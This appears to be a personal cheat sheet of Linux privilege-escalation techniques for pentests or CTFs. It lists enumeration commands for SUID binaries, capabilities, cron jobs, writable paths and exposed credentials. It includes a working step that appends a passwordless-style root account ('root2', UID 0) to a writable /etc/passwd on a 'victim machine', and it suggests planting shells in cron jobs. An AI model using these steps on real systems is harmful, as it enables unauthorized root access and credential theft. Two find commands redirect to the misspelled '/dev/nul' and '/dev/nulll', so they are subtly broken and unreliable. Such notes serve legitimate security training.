Linux Privesc Notes

Quick rundown on some easy wins for Linux privesc. Use LinPEAS in tandem to maximize potential for finding interesting things.

Are components exploitable?

Basic idea here is to check for whether there's any application or kernel exploits you can take advantage of.

  • What is system version? Are there kernel exploits?
    • uname -a
    • cat /etc/issue
  • What's installed?
    • dpkg --list
      • note that this is every package and could take a while to go through...

Are permissions misconfigured?

Here the idea is to see if there's something you can write to that's run from an elevated context, like a cronjob, dependency, or to find an exploitable file permission via GTFOBins etc. In either case, you can often drop in a shell and get a win.

  • writable files or directories?
    • find / -writable -type d 2>/dev/nul
    • find / -writable -type f 2>/dev/nulll
    • if /etc/passwd is writable, do this locally on the victim machine:
      • └─$ openssl passwd w00t
      • └─$ echo "root2:h842dpEP28MMA:0:0:root:/root:/bin/bash" >> /etc/passwd
  • Check for sudo -l
    • Can do GTFObins?
    • Need user password for this.
  • Check for SUID
    • find / -perm -u=s -type f 2>/dev/null
    • Is gtfobin'able?
  • Check for capabilities:
    • /usr/sbin/getcap -r / 2>/dev/null
    • Can do GTFObins?
  • Check cronjobs
    • ls -lah /etc/cron*
      • in CTFs and suchlike, something nonstandard in hourly is probably a good indicator that this is the way up.
    • running crons:
      • cat /var/log/cron.log
    • Writable cron binaries/scripts?
  • Check PATH
    • echo $PATH
      • writable path? Think of it sorta like unquoted service path.

Is critical information exposed?

More or less, can you find creds stored in plaintext?

  • Is there interesting information in files?
    • find / -name *.kdbx -type f 2>/dev/null
      • replace *.kdbx with other filetypes that might be interesting. Think about db configs, gits, any source code/scripts that may authenticate to something, etc.
  • running processes?
    • ps aux
    • top -n 1
    • Any creds in command lines? e.g. like a mysql -u root -p QwE123rfww -h 192.168.13.14 sort of situation.
  • Listening network connections?
    • netstat -tunlp
  • Check history; probably nothing, but do it anyway.